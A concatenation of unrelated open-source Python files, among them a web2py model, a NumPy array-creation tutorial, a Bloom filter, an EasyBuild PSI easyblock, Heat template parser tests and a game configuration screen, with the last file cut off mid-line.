for line in logs.output:
self.assertLess(
len(line), truncate_length,
'Logging function lines should not be of truncating length.')
if __name__ == '__main__':
v2_compat.enable_v2_behavior()
test.main()
|
bmi-forum/bmi-pyre | pythia-0.8/packages/pulse/tests/signon.py | Python | gpl-2.0 | 867 | 0.00692 | #!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Michael A.G. Aivazis
# | California Institute of Technology
# (C) 1998-2005 All Rights Reserved
#
# <LicenseText>
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
if __name__ == "__main__":
import pulse
from pulse import pulse as pulsemodule
print "copyright information:"
print " ", pulse.copyright()
print " ", pulsemodule.copyright()
| print
print "module information:"
print " file:", pulsemodule.__file__
print " doc:", pulsemodule.__doc__
print " contents:", dir(pulsemodule)
# version
__id__ = "$Id: signon.py,v 1.1.1.1 2005/03/08 16:13:57 aivazis Exp $"
# End of file
|
urrego093/proyecto_mv | applications/welcome/models/db.py | Python | gpl-3.0 | 4,097 | 0.01196 | # -*- coding: utf-8 -*-
#########################################################################
## This scaffolding model makes your app work on Google App Engine too
## File is released under public domain and you can use without limitations
#########################################################################
## if SSL/HTTPS is properly configured and you want all HTTP requests to
## be redirected to HTTPS, uncomment the line below:
# request.requires_https()
## app configuration made easy. Look inside private/appconfig.ini
from gluon.contrib.appconfig import AppConfig
## once in production, remove reload=True to gain full speed
myconf = AppConfig(reload=True)
if not request.env.web2py_runtime_gae:
## if NOT running on Google App Engine use SQLite or other DB
db = DAL(myconf.get('db.uri'),
pool_size = myconf.get('db.pool_size'),
migrate_enabled = myconf.get('db.migrate'),
check_reserved = ['all'])
else:
## connect to Google BigTable (optional 'google:datastore://namespace')
db = DAL('google:datastore+ndb')
## store sessions and tickets there
session.connect(request, response, db=db)
## or store session in Memcache, Redis, etc.
## from gluon.contrib.memdb import MEMDB
## from google.appengine.api.memcache import Client
## session.connect(request, response, db = MEMDB(Client()))
## by default give a view/generic.extension to all actions from localhost
## none otherwise. a pattern can be 'controller/function.extension'
response.generic_patterns = ['*'] if request.is_local else []
## choose a style for forms
response.formstyle = myconf.get('forms.formstyle') # or 'bootstrap3_stacked' or 'bootstrap2' or other
response.form_label_separator = myconf.get('forms.separator') or ''
## (optional) optimize handling of static files
# response.optimize_css = 'concat,minify,inline'
# response.optimize_js = 'concat,minify,inline'
## (optional) static assets folder versioning
# response.static_version = '0.0.0'
#########################################################################
## Here is sample code if you need for
## - email capabilities
## - authentication (registration, login, logout, ... )
## - authorization (role based authorization)
## - services (xml, csv, json, xmlrpc, jsonrpc, amf, rss)
## - old style crud actions
## (more options discussed in gluon/tools.py)
#########################################################################
from gluon.tools import Auth, Service, PluginManager
auth = Auth(db, host=myconf.get('host.name'))
service = Service()
plugins = PluginManager()
## create all tables needed by auth if not custom tables
auth.define_tables(username=False, signature=False)
## configure email
mail = auth.settings.mailer
mail.settings.server = 'logging' if request.is_local else myconf.get('smtp.server')
mail.settings.sender = myconf.get('smtp.sender')
mail.settings.login = myconf.get('smtp.login')
mail.settings.tls = myconf.get('smtp.tls') or False
mail.settings.ssl = myconf.get('smtp.ssl') or False
## configure auth policy
auth.settings.registration_requires_verification = False
auth.settings.registration_requires_approval = False
auth.settings.reset_password_requires_verification = True
#########################################################################
## Define your tables below (or better in another model file) for example
##
## >>> db.define_table('mytable',Field('myfield','string'))
##
## Fields can be 'string','text','password','integer','double','boolean'
## 'date','time','datetime','blob','upload', 'reference TABLENAME'
## There is an implicit 'id int | eger autoincrement' field
## Consult manual for more options, validators, etc.
##
## More API examples for controllers:
##
## >>> db.mytable.insert(myfield='value')
## >>> rows=db(db.mytable.myfield=='value').select(db.myta | ble.ALL)
## >>> for row in rows: print row.id, row.myfield
#########################################################################
## after defining tables, uncomment below to enable auditing
# auth.enable_record_versioning(db)
|
sirikata/scene-generator | scene.py | Python | bsd-2-clause | 4,096 | 0.00708 | import numpy
import cache
import open3dhub
def sirikata_bounds(boundsInfo):
minpt, maxpt = boundsInfo['bounds']
minpt, maxpt = numpy.copy(minpt), numpy.copy(maxpt)
center = boundsInfo['center']
center_distance = boundsInfo['center_farthest_distance']
# center the bounding box
minpt -= center
maxpt -= center
# bounding box is scaled by 1 / (distance from center to farthest point)
minpt /= center_distance
maxpt /= center_distance
return (minpt, maxpt)
def height_offset(boundsInfo):
minpt, maxpt = sirikata_bounds(boundsInfo)
height_range = (maxpt[2] - minpt[2])
return height_range / 2.0
def mapgen_coords_to_sirikata(loc, terrain):
# mapgen starts at 0,0,0 as the corner, but terrain gets centered at 0,0,0
loc = loc - terrain.center
# scale the coordinates to the scaled coordinates of the terrain mesh
loc /= terrain.boundsInfo['center_farthest_distance']
# then scale back by the terrain's scale
loc *= terrain.scale
# adjust the height by how much the terrain is offset
loc[2] += height_offset(terrain.boundsInfo) * terrain.scale
return loc
class SceneModel(object):
def __init__(self, path, x, y, z, scale, model_type,
orient_x=0, orient_y=0, orient_z=0, orient_w=1):
self.path = path
self.x = x
self.y = y
self.z = z
self.scale = scale
self.model_type = model_type
self.orient_x = orient_x
self.orient_y = orient_y
self.orient_z = orient_z
self.orient_w = orient_w
self._metadata = None
self._mesh = None
self._boundsInfo = None
def _load_mesh(self):
if self._mesh is None:
| self._metadata, self._mesh = open3dhub.path_to_mesh(self.path, cache=True)
def _get_mesh(self):
self._load_mesh()
return self._mesh
mesh = property(_get_mesh)
def _get_metadata(self):
if self._metadata is N | one:
self._metadata = cache.get_metadata(self.path)
return self._metadata
metadata = property(_get_metadata)
def _get_bounds_info(self):
if self._boundsInfo is None:
self._boundsInfo = cache.get_bounds(self.path)
return self._boundsInfo
boundsInfo = property(_get_bounds_info)
center = property(lambda s: s.boundsInfo['center'])
v3 = property(lambda s: numpy.array([s.x, s.y, s.z], dtype=numpy.float32))
sirikata_uri = property(lambda s: 'meerkat:///' +
s.metadata['basepath'] + '/' +
'optimized' + '/' +
s.metadata['version'] + '/' +
s.metadata['basename'])
def to_json(self):
z = self.z + height_offset(self.boundsInfo) * self.scale
# below swaps from z-up to y-up
return {
'path': self.path,
'sirikata_uri': self.sirikata_uri,
'x': self.x,
'y': z,
'z': -1.0 * self.y,
'orient_x': self.orient_x,
'orient_y': self.orient_z,
'orient_z': -1.0 * self.orient_y,
'orient_w': self.orient_w,
'scale': self.scale,
'type': self.model_type,
}
def __str__(self):
return '<SceneModel %s <%.7g,%.7g,%.7g> %.7g>' % \
(self.path, self.x, self.y, self.z, self.scale)
def __repr__(self):
return str(self)
@staticmethod
def from_json(j):
m = SceneModel(j['path'],
j['x'],
-1.0 * j['z'],
j['y'],
j['scale'],
j['type'],
orient_x=j['orient_x'],
orient_y=-1.0 * j['orient_z'],
orient_z=j['orient_y'],
orient_w=j['orient_w'])
return m
|
ivanovmi/google-cli-tools | setup.py | Python | gpl-2.0 | 218 | 0 | #!/usr/bin/env python
# -- coding: utf-8 --
__author__ = 'michael'
import setuptools
try:
import multiprocessing # noqa
except ImportError:
pass
setuptools.setup(
setup_requires=['pbr'],
pbr=True) | ||
Akagi201/akcode | python/numpy/numpy_create.py | Python | gpl-2.0 | 3,554 | 0.012158 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
## NumPy提供了很多专门用于创建数组的函数
"""
arange()类似于内置函数range(),通过指定开始值、终值和步长创建表示等差数列的一维数组,注意所得到的结果数组不包含终值。
例如下面的程序创建开始值为0、终值为1、步长为0.1的等差数组,注意终值1不在数组中:
"""
import numpy as np
print np.arange(0, 1, 0.1)
"""
linspace()通过指定开始值、终值和元素个数创建表示等差数列的一维数组,可以通过endpoint参数指定是否包含终值,缺省值为True,即包含终值。
下面两个例子分别演示了endpoint为True和False时的结果,注意endpoint的值会改变数组的等差步长:
"""
print np.linspace(0, 1, 10) # 步长为 1/9
print np.linspace(0, 1, 10, endpoint = False) # 步长为 1/10
"""
logspace()和linspace()类似,不过它所创建的数组是等比数列。
下面的例子产生从到、有5个元素的等比数列,注意起始值0表示,而终值2表示:
"""
print np.logspace(0, 2, 5)
"""
基数可以通过base参数指定,其缺省值为10。
下面通过将base参数设置为2,并设置endpoint参数为True,创建一个比例为2^(1/12)的等比数组
"""
print np.logspace(0, 1, 12, base = 2, endpoint = False)
"""
zeros()、ones()、empty()可以创建指定形状和类型的数组。其中empty()只分配数组所使用的内存,不对数组元素进行初始化操作,
因此它的运行速度是最快的。下面的程序创建一个形状为(2,3),元素类型为整数的数组:
"""
print np.empty((2, 3), np.int) # 只分配内存, 不对其进行初始化
"""
而zero | s()则将数组元素初始化为0,ones()将数组元素初始化为1。
下面创建一个长度为4、元素类型为浮点数的一维数组,并且元素全部初始化为0:
"""
print np.zeros(4, np.float)
print np.ones(4, np.float)
"""
使用frombuffer()、fromstring()、fromfile()等函数可以从字节序列或者文件创建数组
"""
s = "abcdefg | h"
"""
Python的字符串实际上是一个字节序列,每个字符占一个字节,因此如果从字符串s创建一个8bit的整数数组,
所得到的数组正好就是字符串中每个字符的ASCII编码
"""
print np.fromstring(s, dtype = np.int8)
"""
如果从字符串s创建16bit的整数数组,那么两个相邻的字节就表示一个整数,把字节98和字节97当作一个16位的整数,
它的值就是98*256+97 = 25185。可以看出16bit的整数是以低位字节在前(little-endian)的方式保存在内存中的
"""
print np.fromstring(s, dtype = np.int16)
## 把整个字符串转换为一个64bit的双精度浮点数数组
print np.fromstring(s, dtype = np.float)
## 可以先定义一个从下标计算数值的函数,然后用fromfunction()通过此函数创建数组
def func(i):
return i % 4 + 1
"""
fromfunction()的第一个参数为计算每个数组元素的函数,第二个参数指定数组的形状。因为它支持多维数组,
所以第二个参数必须是一个序列。上例中第二个参数是长度为1的元组(10,),因此创建了一个有10个元素的一维数组。
"""
np.fromfunction(func, (10,))
## 下面的例子创建一个表示九九乘法表的二维数组,输出的数组a中的每个元素a[i, j]都等于func2(i, j):
def func2(i, j):
return (i + 1) * (j + 1)
a = np.fromfunction(func2, (9, 9))
print a
|
Stanford-Online/edx-submissions | submissions/migrations/0002_auto_20151119_0913.py | Python | agpl-3.0 | 948 | 0.00211 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import submissions.models
class Migration(migrations.Migration):
dependencies = [
('submissions', '0001_initial'),
]
operations = [
migrations.CreateModel(
| name='ScoreAnnotation',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('annotation_type', models.CharField(max_length=255, db_index=True)),
('creator', submissions.models.AnonymizedUserIDField()),
| ('reason', models.TextField()),
('score', models.ForeignKey(to='submissions.Score')),
],
),
migrations.AlterField(
model_name='studentitem',
name='student_id',
field=submissions.models.AnonymizedUserIDField(),
),
]
|
chrisdrackett/django-support | support/functions.py | Python | bsd-3-clause | 187 | 0.016043 | from django.utils.importlib import i | mport_module
def function_from_string(string):
modu | le, func = string.rsplit(".", 1)
m = import_module(module)
return getattr(m, func) |
dwighthubbard/micropython-cloudmanager | cloudmanager/utility.py | Python | mit | 538 | 0.001859 | """
Basic utility functions
"""
import redislite
from .server import RDB | _FILE
def header(message, width=80):
header_message = '## ' + message | + ' '
end_chars = width - (len(message) + 4)
header_message += '#'*end_chars
print(header_message)
def connect_to_redis():
return redislite.Redis(dbfilename=RDB_FILE)
host = read_rc_config()["settings"].get('redis_server', '127.0.0.1')
port = read_rc_config()["settings"].get('redis_port', '18266')
port = int(port)
return redis.Redis(host=host, port=port)
|
cloudbase/heat2arm | heat2arm/parser/tests/hot/test_template.py | Python | apache-2.0 | 2,462 | 0 | # Copyright 2015 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
This module contains tests for Heat template parsing mechanics.
"""
import unittest
from yaml.parser import ParserError
from heat2arm.parser.common.exceptions import (
TemplateDataException
)
from heat2arm.parser.hot.constants import HEAT_TEMPLATE_FIELDS
from heat2arm.parser.testing.hot_testing import COMPLETE_TEST_TEMPLATE
from heat2arm.parser.testing.template_testing import (
TemplateParsingTestInput,
TemplateParsingTestCase
)
class HeatTemplateParsingTestCase(TemplateParsingTestCase, unittest.TestCase):
""" HeatTemplateParsingTestCase respresents a set of tests which ensure the
prope | r parsing of Heat Templates.
"""
_field_names = HEAT_TEMPLATE_FIELDS
_function_application_test_data = COMPLETE_TEST_TEMPLATE
_re | source_parsing_test_data = COMPLETE_TEST_TEMPLATE
_template_parsing_test_data = [
TemplateParsingTestInput(
"test empty template",
"",
TemplateDataException
),
TemplateParsingTestInput(
"test invalid JSON",
"some : [random] _ ness )",
ParserError
),
TemplateParsingTestInput(
"not a valid template",
"it's just a string...",
TemplateDataException
),
TemplateParsingTestInput(
"no relevant fields provided",
"{ 'some': 'random_dict' }",
TemplateDataException
),
TemplateParsingTestInput(
"no 'parameters' field provided",
"{ 'resources': 'they should be here...' }",
TemplateDataException
),
TemplateParsingTestInput(
"no 'resources' field provided",
"{ 'parameters': 'some_random_parameters_data' }",
TemplateDataException
),
]
|
nealzhang/util | FastBloomFilter.py | Python | lgpl-3.0 | 2,828 | 0.02157 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from FastBitSet import FastBitSet
import math
import mmh3
class FastBloomFilter(object):
mask32 = 0xffffffff
mask64 = 0xffffffffffffffff
mask128 = 0xffffffffffffffffffffffffffffffff
seeds = [2, 3, 5, 7, 11,
13, 17, 19, 23, 29,
31, 37, 41, 43, 47,
53, 59, 61, 67, 71,
73, 79, 83, 89, 97,
101, 103, 107, 109, 113,
127, 131, 137, 139, 149,
151, 157, 163, 167, 173,
179, 181, 191, 193, 197,
199, 211, 223, 227, 229,
233, 239, 241, 251, 257,
263, 269, 271, 277, 281,
283, 293, 307, 311, 313,
317, 331, 337, 347, 349,
353, 359, 367, 373, 379,
383, 389, 397, 401, 409,
419, 421, 431, 433, 439,
| 443, 449, 457, 461, 463,
467, 479, 487, 491, 499,
503, 509, 521, 523, 541,
547, 557, 563, 569, 571,
577, 587, 593, 599, 601,
607, 613, 617, 619, 631,
641, 643, 647, 653, 659,
661, 673, 677, 683, 691]
def __init__(self, n, fpr=0.00001):
m = -1 * math.log(fpr, math.e) * n / math.pow(math.log(2, math.e), 2)
k = (m / n) * math.log(2, math.e)
sel | f.n = int(math.ceil(n))
self.fpr = fpr
self.m = int(math.ceil(m))
self.k = int(k)
self.bsUnitSize = 64
self.bsCap = int(math.ceil(self.m / 64))
self.bitSet = FastBitSet(self.bsCap, self.bsUnitSize)
self.bitSetLength = self.bitSet.length
def append(self, s):
self.bitSet.setList(self.hashs(s, self.k))
def exists(self, s):
bites = self.bitSet.getList(self.hashs(s, self.k))
return not (0 in bites)
def remove(self, s):
self.bitSet.setList(self.hashs(s, self.k), False)
def clear(self):
self.bitSet.clear()
def hashs(self, s, k):
bitSetLength = self.bitSetLength
#mask = self.mask32
mask = self.mask128
seeds = self.seeds
hashs = []
for i in range(k):
#print(mmh3.hash64(s, seeds[i]))
#hashs.append((mmh3.hash(s, seeds[i]) & mask) % bitSetLength)
hashs.append((mmh3.hash128(s, seeds[i]) & mask) % bitSetLength)
return hashs
def hashs2(self, s, k):
bitSetLength = self.bitSetLength
mask = self.mask32
hashs = []
hash1 = mmh3.hash64(s, 0)
hash2 = mmh3.hash64(s, hash1)
for i in k:
hashs.append(((hash1 + i * hash2) % bitSetLength) & mask)
return hashs
|
jungla/ICOM-fluidity-toolbox | Detectors/offline_advection/plot_Tracer_spec.py | Python | gpl-2.0 | 3,374 | 0.035566 | import os, sys
import myfun
import numpy as np
import matplotlib as mpl
mpl.use('ps')
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from scipy import interpolate
import lagrangian_st | ats
import scipy.fftpack
## READ archive (too many points... somehow)
# args: name, dayi, dayf, days
#label = 'm_25_2_512'
label = 'm_25_1_particles'
dayi = 0 #10*24*2
dayf = 1 #10*24*4
days = 1
#label = sys.argv[1]
#basename = sys.argv[2]
#dayi = int(sys.argv[3])
#da | yf = int(sys.argv[4])
#days = int(sys.argv[5])
path = '../Tracer_CG/'
try: os.stat('./plot/'+label)
except OSError: os.mkdir('./plot/'+label)
# dimensions archives
# ML exp
Xlist = np.linspace(0,2000,161)
Ylist = np.linspace(0,2000,161)
Zlist = np.linspace(0,-50,51)
dl = [0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1]
Zlist = np.cumsum(dl)
xn = len(Xlist)
yn = len(Ylist)
zn = len(Zlist)
dx = np.diff(Xlist)
z = 1
for time in range(dayi,dayf,days):
print 'time:', time
tlabel = str(time)
while len(tlabel) < 3: tlabel = '0'+tlabel
#Velocity_CG_m_50_6e_9.csv
file0 = path+'Tracer_'+str(z)+'_CG_'+label+'_'+str(time)+'.csv'
#
T = lagrangian_stats.read_Scalar(file0,zn,xn,yn)
T = np.sum(T,0)/3.
FT = np.zeros((xn/1,yn))
#
for j in range(len(Ylist)):
tempfft = scipy.fftpack.fft(T[:,j]**2,xn)
FT[:,j] = abs(tempfft)**2
w = scipy.fftpack.fftfreq(xn, dx[1])
# w = scipy.fftpack.fftshift(w)
FTp = np.mean(FT,1)/xn
# ideal t=0
Theory = T*0 + 3
for j in range(len(Ylist)):
tempfft = scipy.fftpack.fft(Theory[:,j]**2,xn)
FT[:,j] = abs(tempfft)**2
w = scipy.fftpack.fftfreq(xn, dx[1])
# w = scipy.fftpack.fftshift(w)
FTpT = np.mean(FT,1)/xn
fig = plt.figure(figsize=(10,8))
p25, = plt.plot(w, FTp,'r',linewidth=2)
# p25theory, = plt.plot(w[w>=0], FTpT[w>=0],'b',linewidth=2)
# plt.legend([p25,p25theory],['Model [$C=1.0\pm 10^{-11}$]','Theory [$C=1.0$]'])
# plt.plot([5*10**-3, 5*10**-2],[5*10**-22 , 5*10**-( 22+5/3.)],'k',linewidth=1.5)
# plt.plot([5*10**-3, 5*10**-2],[5*10**-22 , 5*10**-( 22+3.)],'k',linewidth=1.5)
# plt.plot([5*10**-3, 5*10**-2],[5*10**-22 , 5*10**-( 22+1.)],'k',linewidth=1.5)
# plt.text(6*10**-2, 5*10**-( 22+5/3.), '-5/3',fontsize=18)
# plt.text(6*10**-2, 5*10**-( 22+3.), '-3',fontsize=18)
# plt.text(6*10**-2, 5*10**-( 22+1.), '-1',fontsize=18)
# plt.text(10**-3, 10**-22,str(time*360./3600)+'hr',fontsize=18)
# plt.ylim((10**-32,10**-19))
plt.xlabel(r'k $[m^{-1}]$',fontsize=20)
plt.ylabel(r'PSD',fontsize=20)
plt.yticks(fontsize=18)
plt.xticks(fontsize=18)
# plt.xlim([1/2000.,1/10.])
plt.savefig('./plot/'+label+'/Tracer_'+str(z)+'_CG_'+label+'_'+tlabel+'_spec.eps',bbox_inches='tight')
print './plot/'+label+'/Tracer_'+str(z)+'_CG_'+label+'_'+tlabel+'_spec.eps'
plt.close()
#
v = np.linspace(0, 10, 10, endpoint=True)
vl = np.linspace(0, 10, 5, endpoint=True)
fig = plt.figure(figsize=(6,6))
fig.add_subplot(111,aspect='equal')
plt.contourf(Xlist/1000,Ylist/1000,T,30,extend='both',cmap=plt.cm.PiYG)
plt.colorbar()
plt.title(str(np.round(10*(time*360./3600))/10.0)+'h')
plt.ylabel('Y [km]',fontsize=16)
plt.xlabel('X [km]',fontsize=16)
plt.savefig('./plot/'+label+'/Tracer_'+str(z)+'_CG_'+label+'_'+str(time)+'.eps',bbox_inches='tight')
print './plot/'+label+'/Tracer_'+str(z)+'_CG_'+label+'_'+str(time)+'.eps'
plt.close()
|
boegel/easybuild-easyblocks | easybuild/easyblocks/p/psi.py | Python | gpl-2.0 | 11,600 | 0.003534 | ##
# Copyright 2013-2021 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# https://github.com/easybuilders/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for building and installing PSI, implemented as an easyblock
@author: Kenneth Hoste (Ghent University)
@author: Ward Poelmans (Ghent University)
"""
from distutils.version import LooseVersion
import glob
import os
import shutil
import tempfile
import easybuild.tools.environment as env
from easybuild.easyblocks.generic.cmakemake import CMakeMake
from easybuild.easyblocks.generic.configuremake import ConfigureMake
from easybuild.framework.easyconfig import BUILD
from easybuild.tools.build_log import EasyBuildError
from easybuild.tools.modules import get_software_root
from easybuild.tools.run import run_cmd
class EB_PSI(CMakeMake):
"""
Support for building and installing PSI
"""
def __init__(self, *args, **kwargs):
"""Initialize class variables custom to PSI."""
super(EB_PSI, self).__init__(*args, **kwargs)
self.psi_srcdir = None
self.install_psi_objdir = None
self.install_psi_srcdir = None
@staticmethod
def extra_options():
"""Extra easyconfig parameters specific to PSI."""
extra_vars = CMakeMake.extra_options()
extra_vars.update({
# always include running PSI unit tests (takes about 2h or less)
'runtest': ["tests TESTFLAGS='-u -q'", "Run tests included with PSI, without interruption.", BUILD],
})
# Doesn't work with out-of-source build
extra_vars['separate_build_dir'][0] = False
return extra_vars
def configure_step(self):
"""
Configure build outside of source directory.
"""
try:
objdir = os.path.join(self.builddir, 'obj')
os.makedirs(objdir)
os.chdir( | objdir)
except OSError as err:
raise EasyBuildError("Failed to prepare for configuration of PSI build: %s", err)
env.setvar('F77FLAGS', os.getenv('F90FLAGS'))
# In order to create new plugins with PSI, it needs to know the location of the source
# and the obj dir after install. These env vars give that information to the | configure script.
self.psi_srcdir = os.path.basename(self.cfg['start_dir'].rstrip(os.sep))
self.install_psi_objdir = os.path.join(self.installdir, 'obj')
self.install_psi_srcdir = os.path.join(self.installdir, self.psi_srcdir)
env.setvar('PSI_OBJ_INSTALL_DIR', self.install_psi_objdir)
env.setvar('PSI_SRC_INSTALL_DIR', self.install_psi_srcdir)
# explicitely specify Python binary to use
pythonroot = get_software_root('Python')
if not pythonroot:
raise EasyBuildError("Python module not loaded.")
# pre 4.0b5, they were using autotools, on newer it's CMake
if LooseVersion(self.version) <= LooseVersion("4.0b5") and self.name == "PSI":
# Use EB Boost
boostroot = get_software_root('Boost')
if not boostroot:
raise EasyBuildError("Boost module not loaded.")
self.log.info("Using configure based build")
env.setvar('PYTHON', os.path.join(pythonroot, 'bin', 'python'))
env.setvar('USE_SYSTEM_BOOST', 'TRUE')
if self.toolchain.options.get('usempi', None):
# PSI doesn't require a Fortran compiler itself, but may require it to link to BLAS/LAPACK correctly
# we should always specify the sequential Fortran compiler,
# to avoid problems with -lmpi vs -lmpi_mt during linking
fcompvar = 'F77_SEQ'
else:
fcompvar = 'F77'
# update configure options
# using multi-threaded BLAS/LAPACK is important for performance,
# cfr. http://sirius.chem.vt.edu/psi4manual/latest/installfile.html#sec-install-iii
opt_vars = [
('cc', 'CC'),
('cxx', 'CXX'),
('fc', fcompvar),
('libdirs', 'LDFLAGS'),
('blas', 'LIBBLAS_MT'),
('lapack', 'LIBLAPACK_MT'),
]
for (opt, var) in opt_vars:
self.cfg.update('configopts', "--with-%s='%s'" % (opt, os.getenv(var)))
# -DMPICH_IGNORE_CXX_SEEK dances around problem with order of stdio.h and mpi.h headers
# both define SEEK_SET, this makes the one for MPI be ignored
self.cfg.update('configopts', "--with-opt='%s -DMPICH_IGNORE_CXX_SEEK'" % os.getenv('CFLAGS'))
# specify location of Boost
self.cfg.update('configopts', "--with-boost=%s" % boostroot)
# enable support for plugins
self.cfg.update('configopts', "--with-plugins")
ConfigureMake.configure_step(self, cmd_prefix=self.cfg['start_dir'])
else:
self.log.info("Using CMake based build")
self.cfg.update('configopts', ' -DPYTHON_EXECUTABLE=%s' % os.path.join(pythonroot, 'bin', 'python'))
if self.name == 'PSI4' and LooseVersion(self.version) >= LooseVersion("1.2"):
self.log.info("Remove the CMAKE_BUILD_TYPE test in PSI4 source and the downloaded dependencies!")
self.log.info("Use PATCH_COMMAND in the corresponding CMakeLists.txt")
self.cfg['build_type'] = 'EasyBuildRelease'
if self.toolchain.options.get('usempi', None):
self.cfg.update('configopts', " -DENABLE_MPI=ON")
if get_software_root('imkl'):
self.cfg.update('configopts', " -DENABLE_CSR=ON -DBLAS_TYPE=MKL")
if self.name == 'PSI4':
pcmsolverroot = get_software_root('PCMSolver')
if pcmsolverroot:
if LooseVersion(self.version) >= LooseVersion("1.1"):
pcmsolver = 'PCMSolver'
else:
pcmsolver = 'PCMSOLVER'
self.cfg.update('configopts', " -DENABLE_%s=ON" % pcmsolver)
if LooseVersion(self.version) < LooseVersion("1.2"):
self.cfg.update('configopts', " -DPCMSOLVER_ROOT=%s" % pcmsolverroot)
else:
self.cfg.update('configopts', " -DCMAKE_INSIST_FIND_PACKAGE_PCMSolver=ON "
"-DPCMSolver_DIR=%s/share/cmake/PCMSolver" % pcmsolverroot)
chempsroot = get_software_root('CheMPS2')
if chempsroot:
if LooseVersion(self.version) >= LooseVersion("1.1"):
chemps2 = 'CheMPS2'
else:
chemps2 = 'CHEMPS2'
self.cfg.update('configopts', " -DENABLE_%s=ON" % chemps2)
if LooseVersion(self.version) < LooseVersion("1.2"):
self.cfg.update('configopts', " -DCHEMPS2_ROOT=%s" % chempsroot)
else:
self.cfg.update('configopts', " -DCMAKE_INSIST_FIND_PACKAGE_CheMPS2=ON "
"-DCheMPS2_DIR=%s/share/cmake/CheMPS2" % chempsroot)
# Be aware, PSI4 wa |
tshirtman/ultimate-smash-friends | usf/screens/network_game_conf_screen.py | Python | gpl-3.0 | 6,713 | 0.006108 | ################################################################################
# copyright 2010 Lucas Baudin <xapantu@gmail.com> #
# #
# This file is part of Ultimate Smash Friends. #
# #
# Ultimate Smash Friends is free software: you can redistribute it and/or #
# modify it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or (at your #
# option) any later version. #
# #
# Ultimate Smash Friends is distributed in the hope that it will be useful, but#
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or#
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for #
# more details. #
# #
# You should have received a copy of the GNU General Public License along with #
# Ultimate Smash Friends. If not, see <http://www.gnu.org/licenses/>. #
################################################################################
'''
Show connected users list, player choices and level choice for a network game,
this screen should be seen identically by the player hosting the game and the
player(s) joining it, only each player can only chose his character. Level can
be chosen by both, the game start when both player have clicked the "start
game" button (maybe with some time delay, and with possibility to cancel?).
'''
from usf.screens.screen import Screen
from usf import CONFIG
from usf.widgets.box import VBox, HBox
from usf.widgets.button import Button
from usf.widgets.image import Image
from usf.widgets.spinner import Spinner
from usf.widgets.label import Label
from usf.widgets.checkbox_text import TextCheckBox
from usf.widgets.text_entry import TextEntry
from usf.widgets.coverflow import Coverflow
from usf.translation import _
from usf import entity_skin
import os
from os.path import join
import logging
class NetworkGameConfScreen(Screen):
""" the network game configuration screen
"""
name_pl1 = 0
name_pl2 = 0
name_pl3 = 0
name_pl4 = 0
players = [0, 0, 0, 0]
def init(self):
self.game_data = {}
self.game_data['character_file'] = []
#I18N: The title of the screen where players can choose their character.
self.name = _("characters")
#create a character file to have the [?] image
self.game_data['character_file'].append(join('characters', 'none'))
self.character = []
#I18N: in the character screen, to select no character for this player
#I18N: (with the [?] icon)
self.character.append(_("None"))
#create a character for every directory in the characters directory.
files = os.listdir(join(CONFIG.system_path, 'characters'))
files.sort()
self.load_chararacters(files)
self.add(VBox())
self.portrait = Image(join(self.game_data['character_file'][0],
"portrait.png"))
self.player_spinner = Spinner(self.character)
player_vbox = VBox()
player_vbox.add(Label(_('Player name'), align='center'))
player_vbox.add(TextEntry(_('unnamed player')))
player_vbox.add(Spinner(self.character))
player_vbox.add(self.portrait, margin_left=65, margin=5, size=(50, 50))
hbox = HBox()
# adding the two box which contains the spinner and the name of the
# characters
hbox.add(player_vbox, margin=400)
self.widget.add(hbox, margin=150)
#create a level image for every directory in the level directory.
files = os.listdir(os.path.join( CONFIG.system_path, 'levels'))
files.sort()
coverflow_data = self.load_levels(files)
self.coverflow = Coverflow(coverflow_data)
self.widget.add(self.coverflow, size=(800, 275))
#next button to go to the level screen
self.widget.add(Button(_("Start")),
margin=83,
align="center")
#back button to come back to main screen
self.widget.add(Button(_('Back')),
margin=20,
align="center")
def load_chararacters(self, files):
""" append characters to self.character, loaded from files in "files".
"""
for f in files:
try:
if f != "none":
self.game_data['character_file'].append(join(
"characters",
f))
self.character.append(entity_skin.EntitySkin(
join('characters', f)).name)
except OSError, e:
if e.errno is 20:
pass
else:
raise
except IOError, e:
pass
def load_levels(self, files):
""" append a level in self.levels
"""
coverflow_data = []
for f in files:
try:
if 'level.xml' in os.listdir(
